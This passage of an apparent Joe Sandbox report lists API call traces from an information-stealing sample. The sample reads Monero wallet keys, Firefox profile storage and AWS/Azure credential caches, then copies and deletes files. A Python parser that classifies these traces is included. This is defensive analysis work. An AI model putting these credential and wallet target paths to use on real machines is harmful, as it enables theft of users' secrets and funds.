                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: cde3c291be77081cafe0a62c8ddd8430af9f7cfd72433f5882c0bf1515c3cf98
                              • Instruction ID: 488a0b5213f8d82ed124c85e33fde4fccc6e8be291b7a0d8dc339c558fb7cc53
                              • Opcode Fuzzy Hash: cde3c291be77081cafe0a62c8ddd8430af9f7cfd72433f5882c0bf1515c3cf98
                              • Instruction Fuzzy Hash: 422127B391C310AFE308BA19DC416BFB7E5EF84360F16892EEAC583B50D635580087D6
                              APIs
                              • lstrlen.KERNEL32(00000000), ref: 007C8636
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C866D
                              • lstrcpy.KERNEL32(?,00000000), ref: 007C86AA
                              • StrStrA.SHLWAPI(?,0145D918), ref: 007C86CF
                              • lstrcpyn.KERNEL32(009E93D0,?,00000000), ref: 007C86EE
                              • lstrlen.KERNEL32(?), ref: 007C8701
                              • wsprintfA.USER32 ref: 007C8711
                              • lstrcpy.KERNEL32(?,?), ref: 007C8727
                              • StrStrA.SHLWAPI(?,0145DC00), ref: 007C8754
                              • lstrcpy.KERNEL32(?,009E93D0), ref: 007C87B4
                              • StrStrA.SHLWAPI(?,0145DCF0), ref: 007C87E1
                              • lstrcpyn.KERNEL32(009E93D0,?,00000000), ref: 007C8800
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcpynlstrlen$wsprintf
                              • String ID: %s%s
                              • API String ID: 2672039231-3252725368
                              • Opcode ID: e9f444700de0c5f3162826ec6cf799e61615eb061a68d1048e89fa4b66c5ca3d
                              • Instruction ID: 1cb4e36db457dbc98031fed540e83d72303302eb0d360d68656cf7d4cf5fcdb2
                              • Opcode Fuzzy Hash: e9f444700de0c5f3162826ec6cf799e61615eb061a68d1048e89fa4b66c5ca3d
                              • Instruction Fuzzy Hash: 22F19E71919154EFCB10DBA4DD88ADBB7B9EF88300F108599F90AE7351DB34AE01DBA1
                              APIs
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007B1F9F
                              • lstrlen.KERNEL32(01458B08), ref: 007B1FAE
                              • lstrcpy.KERNEL32(00000000,?), ref: 007B1FDB
                              • lstrcat.KERNEL32(00000000,?), ref: 007B1FE3
                              • lstrlen.KERNEL32(007E1794), ref: 007B1FEE
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B200E
                              • lstrcat.KERNEL32(00000000,007E1794), ref: 007B201A
                              • lstrcpy.KERNEL32(00000000,?), ref: 007B2042
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007B204D
                              • lstrlen.KERNEL32(007E1794), ref: 007B2058
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B2075
                              • lstrcat.KERNEL32(00000000,007E1794), ref: 007B2081
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B20AC
                              • lstrlen.KERNEL32(?), ref: 007B20E4
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B2104
                              • lstrcat.KERNEL32(00000000,?), ref: 007B2112
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B2139
                              • lstrlen.KERNEL32(007E1794), ref: 007B214B
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B216B
                              • lstrcat.KERNEL32(00000000,007E1794), ref: 007B2177
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B219D
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007B21A8
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B21D4
                              • lstrlen.KERNEL32(?), ref: 007B21EA
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B220A
                              • lstrcat.KERNEL32(00000000,?), ref: 007B2218
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B2242
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007B227F
                              • lstrlen.KERNEL32(0145CF08), ref: 007B228D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B22B1
                              • lstrcat.KERNEL32(00000000,0145CF08), ref: 007B22B9
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B22F7
                              • lstrcat.KERNEL32(00000000), ref: 007B2304
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B232D
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 007B2356
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B2382
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B23BF
                              • DeleteFileA.KERNEL32(00000000), ref: 007B23F7
                              • FindNextFileA.KERNEL32(00000000,?), ref: 007B2444
                              • FindClose.KERNEL32(00000000), ref: 007B2453
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$lstrlen$File$Find$CloseCopyDeleteNext
                              • String ID:
                              • API String ID: 2857443207-0
                              • Opcode ID: 764ed1c42ad19b5a248fbd337f311c1e7becaac81eb220ffa0f3bef44fe28893
                              • Instruction ID: e532bc3a63c0a030ac0fa23a98e0c0e19713f5e3d145d0d0deb750b32f8bf307
                              • Opcode Fuzzy Hash: 764ed1c42ad19b5a248fbd337f311c1e7becaac81eb220ffa0f3bef44fe28893
                              • Instruction Fuzzy Hash: 7AE13071A2625ADBDB21EF64DD89BEE77B9AF44300F044464F805BB212DB38DD46CB90
                              APIs
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007C6445
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007C6480
                              • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 007C64AA
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C64E1
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C6506
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007C650E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C6537
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FolderPathlstrcat
                              • String ID: \..\
                              • API String ID: 2938889746-4220915743
                              • Opcode ID: fb15879922aa93f694f02c9f4cb35bf5d6e0d6c2bc4958cc1c78352900e6df44
                              • Instruction ID: a1dbc8f5d6f0521abb5e37601b74ce9df5aadecbf3d84f3aefe9a06f198f8a6b
                              • Opcode Fuzzy Hash: fb15879922aa93f694f02c9f4cb35bf5d6e0d6c2bc4958cc1c78352900e6df44
                              • Instruction Fuzzy Hash: 31F19F719162469BDB21EF68D889FAE77B9AF44300F14852CF845EB252DB3CDD42CB90
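The three API listings above (the StrStrA/lstrcpyn/wsprintfA routine with the "%s%s" format, the lstrcpy/lstrcat loop ending in CopyFileA, DeleteFileA, FindNextFileA and FindClose, and the SHGetFolderPathA routine paired with the "\..\" string) are raw call traces, and a reader has to infer behaviour from the combination of calls. The Python below is an added example written for this page; it is not part of the Joe Sandbox report, its IDA plugin, or the sample. It parses the report's "api.MODULE(args), ref: addr" line format and maps a function's call set to a short behaviour note. The sample entries are copied verbatim from the listings above; the signature wording (what each call combination means) is this editor's assumption. One fact it relies on: folder id 0x1A passed to SHGetFolderPathA is CSIDL_APPDATA, the roaming %APPDATA% directory.

```python
"""Parse Joe Sandbox per-function 'APIs' listings and flag call-sequence patterns.

Added example for this report page.  The sample entries below are copied from the
listings on the page; the behaviour notes are this editor's interpretation of the
API combinations (an assumption), not something the report itself asserts.
"""
import re
from dataclasses import dataclass

# One call line, e.g.  "• lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007B1F9F"
# or, when the plugin printed no argument list,  "• wsprintfA.USER32 ref: 007C8711"
CALL_RE = re.compile(
    r"^\s*\u2022?\s*(?P<api>\w+)\.(?P<mod>\w+)"   # api.MODULE
    r"(?:\((?P<args>.*)\))?"                      # optional (arg,arg,...)
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"    # call-site address inside the image
)
HEX_ARG = re.compile(r"^[0-9A-Fa-f]{8}$")         # argument printed as a raw 32-bit value
CSIDL_APPDATA = 0x1A                              # SHGetFolderPath id for %APPDATA% (roaming)


@dataclass
class Call:
    api: str
    module: str
    args: list
    ref: int


def parse_calls(text):
    """Return a Call for every line that matches the report's API line format."""
    calls = []
    for line in text.splitlines():
        m = CALL_RE.match(line)
        if not m:
            continue                       # section headers such as 'APIs' or 'Strings'
        raw = m.group("args")
        args = raw.split(",") if raw else []
        calls.append(Call(m.group("api"), m.group("mod"), args, int(m.group("ref"), 16)))
    return calls


def classify(calls, strings=()):
    """Map a function's call set (plus its 'String ID' strings) to behaviour notes.

    The notes describe what the API combination is consistent with; they are
    assumptions about intent, not facts recovered from the binary."""
    apis = {c.api for c in calls}
    notes = []
    if {"FindNextFileA", "CopyFileA", "DeleteFileA", "FindClose"} <= apis:
        notes.append("directory walk that copies each file elsewhere and deletes the original")
    if {"StrStrA", "lstrcpyn"} <= apis:
        notes.append("delimiter search followed by a length-bounded copy (token extraction)")
    if "wsprintfA" in apis and "%s%s" in strings:
        notes.append("joins two strings with wsprintfA(\"%s%s\")")
    for c in calls:
        if (c.api == "SHGetFolderPathA" and len(c.args) > 1
                and HEX_ARG.match(c.args[1]) and int(c.args[1], 16) == CSIDL_APPDATA):
            note = "resolves %APPDATA% via SHGetFolderPathA(CSIDL_APPDATA)"
            if any("\\..\\" in s for s in strings):
                note += " and appends '\\..\\' to reach its parent directory"
            notes.append(note)
    return notes


# Sample input: lines copied from the three listings above (call sites 007C8636.., 007B232D.., 007C6445..).
ENTRY_TOKEN = """\
• lstrlen.KERNEL32(00000000), ref: 007C8636
• lstrcpy.KERNEL32(00000000,00000000), ref: 007C866D
• lstrcpy.KERNEL32(?,00000000), ref: 007C86AA
• StrStrA.SHLWAPI(?,0145D918), ref: 007C86CF
• lstrcpyn.KERNEL32(009E93D0,?,00000000), ref: 007C86EE
• lstrlen.KERNEL32(?), ref: 007C8701
• wsprintfA.USER32 ref: 007C8711
• lstrcpy.KERNEL32(?,?), ref: 007C8727
• StrStrA.SHLWAPI(?,0145DC00), ref: 007C8754
• lstrcpy.KERNEL32(?,009E93D0), ref: 007C87B4
• StrStrA.SHLWAPI(?,0145DCF0), ref: 007C87E1
• lstrcpyn.KERNEL32(009E93D0,?,00000000), ref: 007C8800
"""
ENTRY_HARVEST = """\
• lstrcpy.KERNEL32(00000000,00000000), ref: 007B232D
• CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 007B2356
• lstrcpy.KERNEL32(00000000,00000000), ref: 007B2382
• lstrcpy.KERNEL32(00000000,00000000), ref: 007B23BF
• DeleteFileA.KERNEL32(00000000), ref: 007B23F7
• FindNextFileA.KERNEL32(00000000,?), ref: 007B2444
• FindClose.KERNEL32(00000000), ref: 007B2453
"""
ENTRY_APPDATA = """\
• lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007C6445
• lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007C6480
• SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 007C64AA
• lstrcpy.KERNEL32(00000000,00000000), ref: 007C64E1
• lstrcat.KERNEL32(00000000,00000000), ref: 007C650E
"""

if __name__ == "__main__":
    for name, entry, strs in (("token", ENTRY_TOKEN, ["%s%s"]),
                              ("harvest", ENTRY_HARVEST, []),
                              ("appdata", ENTRY_APPDATA, ["\\..\\"])):
        calls = parse_calls(entry)
        print(f"{name}: {len(calls)} calls -> {classify(calls, strs)}")
```

The parser keeps the "ref:" address as an integer so notes can be tied back to the call site in the dump listed under "Memory Dump Source"; the third argument of CopyFileA (00000001, bFailIfExists) and the "?" placeholders the plugin prints for values it could not resolve are preserved as-is rather than guessed.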
                              APIs
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007C43A3
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007C43D6
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C43FE
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007C4409
                              • lstrlen.KERNEL32(\storage\default\), ref: 007C4414
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C4431
                              • lstrcat.KERNEL32(00000000,\storage\default\), ref: 007C443D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C4466
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007C4471
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C4498
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C44D7
                              • lstrcat.KERNEL32(00000000,?), ref: 007C44DF
                              • lstrlen.KERNEL32(007E1794), ref: 007C44EA
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C4507
                              • lstrcat.KERNEL32(00000000,007E1794), ref: 007C4513
                              • lstrlen.KERNEL32(.metadata-v2), ref: 007C451E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C453B
                              • lstrcat.KERNEL32(00000000,.metadata-v2), ref: 007C4547
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C456E
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C45A0
                              • GetFileAttributesA.KERNEL32(00000000), ref: 007C45A7
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C4601
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C462A
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C4653
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C467B
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007C46AF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$lstrlen$AttributesFile
                              • String ID: .metadata-v2$\storage\default\
                              • API String ID: 1033685851-762053450
                              • Opcode ID: 0a90231189bb881ced6b262bb0f429375f192ef3a2de0d09902055771d0751bb
                              • Instruction ID: 50816863a8d14c66f76840dbdf5079a5de2e405d22d3cfc28e25a19d4381a7f2
                              • Opcode Fuzzy Hash: 0a90231189bb881ced6b262bb0f429375f192ef3a2de0d09902055771d0751bb
                              • Instruction Fuzzy Hash: C5B17F71A162469BDB21EF78DD99FAE77B9AF04300F14412CB845F7252DB38ED028B90
                              APIs
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007C57D5
                              • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 007C5804
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C5835
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C585D
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007C5868
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C5890
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C58C8
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007C58D3
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C58F8
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007C592E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C5956
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007C5961
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C5988
                              • lstrlen.KERNEL32(007E1794), ref: 007C599A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C59B9
                              • lstrcat.KERNEL32(00000000,007E1794), ref: 007C59C5
                              • lstrlen.KERNEL32(0145CED8), ref: 007C59D4
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C59F7
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007C5A02
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C5A2C
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C5A58
                              • GetFileAttributesA.KERNEL32(00000000), ref: 007C5A5F
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C5AB7
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C5B2D
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C5B56
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C5B89
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C5BB5
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007C5BEF
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C5C4C
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C5C70
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$lstrlen$AttributesFileFolderPath
                              • String ID:
                              • API String ID: 2428362635-0
                              • Opcode ID: a8881f14d3888b3caef2327f026264923221050bcba98723390191c5ba77274d
                              • Instruction ID: 03e8c40ef2b29116b503f8e9a7241835789c1a4be04e90a337aaf98513ec3abe
                              • Opcode Fuzzy Hash: a8881f14d3888b3caef2327f026264923221050bcba98723390191c5ba77274d
                              • Instruction Fuzzy Hash: 3E028171A15646DBCB21EF68D889FEE7BB5AF44300F44412CF805A7252DB39ED86CB90
                              APIs
                                • Part of subcall function 007B1120: GetProcessHeap.KERNEL32(00000000,00000104), ref: 007B1135
                                • Part of subcall function 007B1120: RtlAllocateHeap.NTDLL(00000000), ref: 007B113C
                                • Part of subcall function 007B1120: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 007B1159
                                • Part of subcall function 007B1120: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 007B1173
                                • Part of subcall function 007B1120: RegCloseKey.ADVAPI32(?), ref: 007B117D
                              • lstrcat.KERNEL32(?,00000000), ref: 007B11C0
                              • lstrlen.KERNEL32(?), ref: 007B11CD
                              • lstrcat.KERNEL32(?,.keys), ref: 007B11E8
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007B121F
                              • lstrlen.KERNEL32(01458B08), ref: 007B122D
                              • lstrcpy.KERNEL32(00000000,?), ref: 007B1251
                              • lstrcat.KERNEL32(00000000,01458B08), ref: 007B1259
                              • lstrlen.KERNEL32(\Monero\wallet.keys), ref: 007B1264
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B1288
                              • lstrcat.KERNEL32(00000000,\Monero\wallet.keys), ref: 007B1294
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B12BA
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007B12FF
                              • lstrlen.KERNEL32(0145CF08), ref: 007B130E
                              • lstrcpy.KERNEL32(00000000,?), ref: 007B1335
                              • lstrcat.KERNEL32(00000000,?), ref: 007B133D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B1378
                              • lstrcat.KERNEL32(00000000), ref: 007B1385
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B13AC
                              • CopyFileA.KERNEL32(?,?,00000001), ref: 007B13D5
                              • lstrcpy.KERNEL32(00000000,?), ref: 007B1401
                              • lstrcpy.KERNEL32(00000000,?), ref: 007B143D
                                • Part of subcall function 007CEDE0: lstrcpy.KERNEL32(00000000,?), ref: 007CEE12
                              • DeleteFileA.KERNEL32(?), ref: 007B1471
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$lstrlen$FileHeap$AllocateCloseCopyDeleteOpenProcessQueryValue
                              • String ID: .keys$\Monero\wallet.keys
                              • API String ID: 2881711868-3586502688
                              • Opcode ID: f64f4d60d100d9c744a1e27c410a2e89c204636dcd5a86918bcdb2fc0539b70a
                              • Instruction ID: c4aa9a68a4563a0e44f7cdfcf6ed904c1cd498087f2fe647a92c5b1041b09fe8
                              • Opcode Fuzzy Hash: f64f4d60d100d9c744a1e27c410a2e89c204636dcd5a86918bcdb2fc0539b70a
                              • Instruction Fuzzy Hash: E9A15C71A162069BDB21EFB4DC99BEE77B9AF44300F844524F905F7252DB38ED028B90
                              APIs
                              • memset.MSVCRT ref: 007CE740
                              • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 007CE769
                              • lstrcpy.KERNEL32(00000000,?), ref: 007CE79F
                              • lstrcat.KERNEL32(?,00000000), ref: 007CE7AD
                              • lstrcat.KERNEL32(?,\.azure\), ref: 007CE7C6
                              • memset.MSVCRT ref: 007CE805
                              • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 007CE82D
                              • lstrcpy.KERNEL32(00000000,?), ref: 007CE85F
                              • lstrcat.KERNEL32(?,00000000), ref: 007CE86D
                              • lstrcat.KERNEL32(?,\.aws\), ref: 007CE886
                              • memset.MSVCRT ref: 007CE8C5
                              • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 007CE8F1
                              • lstrcpy.KERNEL32(00000000,?), ref: 007CE920
                              • lstrcat.KERNEL32(?,00000000), ref: 007CE92E
                              • lstrcat.KERNEL32(?,\.IdentityService\), ref: 007CE947
                              • memset.MSVCRT ref: 007CE986
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$memset$FolderPathlstrcpy
                              • String ID: *.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                              • API String ID: 4067350539-3645552435
                              • Opcode ID: 7bd14281b7e0c9aa3beb65589a1a79fc822bfee413e1fd02f9c5c1f58b77b71c
                              • Instruction ID: dd0729d435db497bc7d1fed987594cf511a48cc33565dde99e0cb0af35e2d5d4
                              • Opcode Fuzzy Hash: 7bd14281b7e0c9aa3beb65589a1a79fc822bfee413e1fd02f9c5c1f58b77b71c
                              • Instruction Fuzzy Hash: 61713A71E51258ABDB21EB64DC8AFED7374AF48700F4044A8B719BB1C1DA78AE448B54
